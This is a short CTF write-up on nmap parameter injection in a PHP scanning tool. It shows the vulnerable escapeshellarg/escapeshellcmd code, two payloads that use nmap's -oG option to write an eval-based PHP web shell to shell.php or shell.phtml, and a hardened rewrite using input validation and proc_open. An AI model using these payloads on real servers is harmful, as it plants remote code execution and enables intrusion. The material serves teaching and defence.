nmap Parameter Injection

Parameter Injection

References

https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html

https://www.anquanke.com/post/id/107336

https://paper.seebug.org/164/

nmap Parameter Injection

Online Tool

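<?php

// The client-supplied X-Forwarded-For header overrides REMOTE_ADDR,
// so the sandbox name below is derived from a value the client controls.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if (!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    // escapeshellarg() followed by escapeshellcmd(): the second call re-escapes
    // the backslash added by the first, which unbalances the quoting, so the
    // value can split into several nmap arguments.
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    // Per-client working directory, created under the web root.
    $sandbox = md5("glzjin" . $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox ' . $sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F " . $host);
}
?>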

The -oG option (nmap writes the scan results in grepable format to the named file):

payload: ?host=' <?php @eval($_POST["hack"]);?> -oG shell.php '

nmap -T5 -sT -Pn --host-timeout 2 -F <?php @eval($_POST["hack"]);?> -oG shell.php
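
A hardened form of the Online Tool handler above, as an added example (not the challenge's or the original author's code). It assumes PHP 7.4 or later for the array form of proc_open(); validate_host() and scan() are hypothetical helper names.

```php
<?php
// Added example: allowlist validation plus shell-free execution.

/** Return the host if it is an IP literal or RFC 1123 hostname, else null. */
function validate_host(string $raw): ?string
{
    // An IPv4/IPv6 literal is accepted as-is.
    if (filter_var($raw, FILTER_VALIDATE_IP) !== false) {
        return $raw;
    }
    // Otherwise require labels of letters, digits and inner hyphens only.
    // This rejects spaces, quotes, '<', '?' and any value starting with '-',
    // so the value cannot be parsed by nmap as an option such as -oG.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (strlen($raw) <= 253
        && preg_match("/\\A{$label}(?:\\.{$label})*\\z/", $raw) === 1) {
        return strtolower($raw);
    }
    return null;
}

/** Run the same scan as the original handler and return nmap's exit code. */
function scan(string $host): int
{
    // Argument-vector form: no shell is involved, so no escaping function is
    // needed and each array element is passed as exactly one argv entry.
    $argv = ['nmap', '-T5', '-sT', '-Pn', '--host-timeout', '2', '-F', $host];
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'a']];
    $proc = proc_open($argv, $spec, $pipes);
    if ($proc === false) {
        return 1;
    }
    // Encode the output before echoing it into the HTML response.
    echo htmlspecialchars(stream_get_contents($pipes[1]));
    fclose($pipes[1]);
    return proc_close($proc);
}

// No mkdir()/chdir() into a web-served directory: nothing here writes files.
$raw  = $_GET['host'] ?? '';
$host = is_string($raw) ? validate_host($raw) : null;
if ($host === null) {
    http_response_code(400);
    exit('invalid host');
}
scan($host);
```

The two measures are independent: validation keeps option-like or script-like strings out of the argument, and the argv form removes the shell quoting that escapeshellarg() and escapeshellcmd() were fighting over.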

[Wangding Cup 2020, Zhuque Group] Nmap

payload ' <?=eval($_POST["hack"]);?> -oG shell.phtml '